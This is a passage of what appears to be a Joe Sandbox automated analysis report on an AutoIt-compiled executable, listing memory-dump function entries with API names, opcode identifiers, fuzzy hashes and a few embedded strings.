      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: IconNotifyShell_
      • String ID:
      • API String ID: 1144537725-0
      • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
      • Instruction ID: 01276a8ddd7320b295208a59375d11c40cfa85237a161d20aa83b723d50a8394
      • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
      • Instruction Fuzzy Hash: FCF05E2591DB8297F361AB54E405365B6A4F7C4308F840175D5CD07395CE3CD305EB60
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Open_onexit
      • String ID:
      • API String ID: 3030063568-0
      • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
      • Instruction ID: dea86e459ae904febffb9177891cf78dda91c02e897b1d381a2093ef0aaf550e
      • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
      • Instruction Fuzzy Hash: 98E08C59F1E58BA1FA04B769AC8717492B0AFA2345FC056B6C10C82252DE1CD292B320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _onexit
      • String ID:
      • API String ID: 572287377-0
      • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
      • Instruction ID: 7016c222a45e1aaad6d1096fd396c55170e63e8c19721f5f52e9788aec264158
      • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
      • Instruction Fuzzy Hash: 21C01209E5E08BA1F60873BA6C870B441A04FF9300FD00BB5C10D80282CD0C51E67731
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _onexit
      • String ID:
      • API String ID: 572287377-0
      • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
      • Instruction ID: dbbfcb5c75ac44f2a1e842555eddd45c0ca62f6515d7d27d4ec13cd9974104a5
      • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
      • Instruction Fuzzy Hash: 52C0120EE6F08BA0F60873BE5C8707841B04FF5300FD402B5C10D80282CD1C52E67631
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$CurrentVersionWow64_onexit
      • String ID:
      • API String ID: 2932345936-0
      • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
      • Instruction ID: b4e2223213d3632d19324a01df003e91d7042e2a4bffcfa22105919f1037b888
      • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
      • Instruction Fuzzy Hash: 21C0C908E6F08BA0F60873BA58870B441B04FA5300FD002B6C20D80282DD0C51E63631
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AllocHeap
      • String ID:
      • API String ID: 4292702814-0
      • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
      • Instruction ID: de380b99c999a5ce37f0b9115b524317851dea27e337bdb796515d02873ba4e8
      • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
      • Instruction Fuzzy Hash: AEF04F4DB0A347A1FE54B76558122B592945FD4B40FC846B0CD0E862C5DE2CE481B231
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AllocHeap
      • String ID:
      • API String ID: 4292702814-0
      • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
      • Instruction ID: f85abd1420654202ccdfd00e87e09435d81d6e69f4f8da32cd9bf9d7bf7cbf62
      • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
      • Instruction Fuzzy Hash: EDF03A8DA0924765FE24F6616807278D5905FC8BA5F8847B0D92ED62C1DE6CE440B231
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
      • String ID: @GUI_DRAGID$F
      • API String ID: 1993697042-4164748364
      • Opcode ID: 1f011ef66255c26181e289d487c817b34358f478307af32ea451c005801c1275
      • Instruction ID: 98b8e30c9bcc6b509dc73eb973848859aed805806c23af584891cfc4cbaa06bd
      • Opcode Fuzzy Hash: 1f011ef66255c26181e289d487c817b34358f478307af32ea451c005801c1275
      • Instruction Fuzzy Hash: C052A13AA18A42A6FB14AB25D4816B9B764FBC4B80F904175EF5D83BA5CF3CE450F710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
      • String ID:
      • API String ID: 3481653762-0
      • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
      • Instruction ID: 64eb0f4e1293ccee90b0baa85f7d613425a33881c62eeeda791950eb67465f5e
      • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
      • Instruction Fuzzy Hash: 3432BE3AA08A8196F750EF25D4457A9B7A0FBC4B84F804271EE4E43B99CF3DE545EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
      • String ID: %d/%02d/%02d
      • API String ID: 1218376639-328681919
      • Opcode ID: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
      • Instruction ID: 3928575f221f32cf5c1ab18e2e1e278c00a1c6145a3e0f6f36eb7aebe97b1f9f
      • Opcode Fuzzy Hash: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
      • Instruction Fuzzy Hash: FA12143AA0964296F710AF25D8566BDA3A0EFC4B90F804175EE1E47BD5CF3DE502B720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
      • String ID: P
      • API String ID: 1208186926-3110715001
      • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
      • Instruction ID: 42ef0105190eb562e7acdfe476c49c7a8eae3fe0709ea96ae43e48e775201aaf
      • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
      • Instruction Fuzzy Hash: BC12767AA0864296F724AB25D4467BDA7A0FBC1784F900175EE4D43E95CF3EE940FB20
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
      • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
      • API String ID: 2910397461-2439800395
      • Opcode ID: 88c8caf1e1f0b8ed22a318d824a8a9f16d1c793abf9b8bf73a32c8e20423bfa2
      • Instruction ID: bf8ae63955771c692b760661b97932a70242ff8fe78e0a8c6af7537ae0d28235
      • Opcode Fuzzy Hash: 88c8caf1e1f0b8ed22a318d824a8a9f16d1c793abf9b8bf73a32c8e20423bfa2
      • Instruction Fuzzy Hash: C0E1917A6087819AF714EF25E84166AB7A0FBC8B94F904135EE4E43B64CF7CE444EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
      • String ID: Shell_TrayWnd
      • API String ID: 3778422247-2988720461
      • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
      • Instruction ID: b4fda2c428df79fb1ddb493b6336c33cd8aa77b1beb89168ddd362034481134f
      • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
      • Instruction Fuzzy Hash: 8141B829F085125BF7146B26A81563EA396BFC8B91FC54070EC0A87B54DF3EE84AB710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
      • String ID:
      • API String ID: 3372153169-0
      • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
      • Instruction ID: 03eb049fa7d11b9c9331be019b509d61b7f44ca9de37157bc63a666eb659835e
      • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
      • Instruction Fuzzy Hash: 9422C22AA08682A5FB64AB25D8523BDB761FFC4B94F9441B1CA5E47694CF3DE440F320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
      • String ID: default$winsta0$winsta0\default
      • API String ID: 3202303201-1423368268
      • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
      • Instruction ID: a40524288880f45d27638dd43891efd80bec4c8047b9c0cf1dd80412ba1768fb
      • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
      • Instruction Fuzzy Hash: 04A19436B08B419AF710EF61E4412AAA3A5FB85B94F800675EE5D47B98CF3DE005E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
      • String ID: AutoIt v3 GUI
      • API String ID: 1458621304-248962490
      • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
      • Instruction ID: 730d3f90a91257cd2a89531b733d95a04353bfdbea4c554e83f564897ac0ba64
      • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
      • Instruction Fuzzy Hash: BBD17F3AA08A429AF714EF38E8517BD77A1FB84758F900175DA0E436A8DF3CE445E750
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: memcpy_s$_invalid_parameter_noinfo
      • String ID:
      • API String ID: 2880407647-0
      • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
      • Instruction ID: 4e2354de0de2edddaadf7a34fffc48405dff3a0b064c9da464d7dc8b9653a6ee
      • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
      • Instruction Fuzzy Hash: 1203D476A091C29BF735DF249441BF9B7A5FB84788F800135DB0A5BB59DB38A900EB11
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
      • String ID:
      • API String ID: 3222323430-0
      • Opcode ID: 557b8ed243c538382dd5d382c55420d64421fbcb396d52b4b2bf18dae75efa75
      • Instruction ID: 7d4a1dbeb1b0c41493e06cdbf082c52e16429f656c6a9bcc3bc748c9b9f32553
      • Opcode Fuzzy Hash: 557b8ed243c538382dd5d382c55420d64421fbcb396d52b4b2bf18dae75efa75
      • Instruction Fuzzy Hash: 69718F2AB0DA42A6FA10BB15E45627CA361FFC4B84FC080B5E90E477A5DF7CE505B760
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Cursor$Load$ErrorInfoLast
      • String ID:
      • API String ID: 3215588206-0
      • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
      • Instruction ID: 97bf352eae7d9b3ff518c1d141d8caa6f68097b7e3ee44afc88a5d72cdd4f8b1
      • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
      • Instruction Fuzzy Hash: 9C519F36F0DB029AFB48AF64F81A17D73A5EB88744F404479EA0E83784DE7CE455A314
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
      • API String ID: 281475176-2761157908
      • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
      • Instruction ID: 6f5e26c02980c56dd11c5d353f9fafdc2ff89e86eabf2046177c6ba6d39cf0ce
      • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
      • Instruction Fuzzy Hash: 3FB2087AA082829FF724AE25D8416FDB7A1FBC438CF905175DA0A57B84DF3CE504AB50
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: P
      • API String ID: 0-3110715001
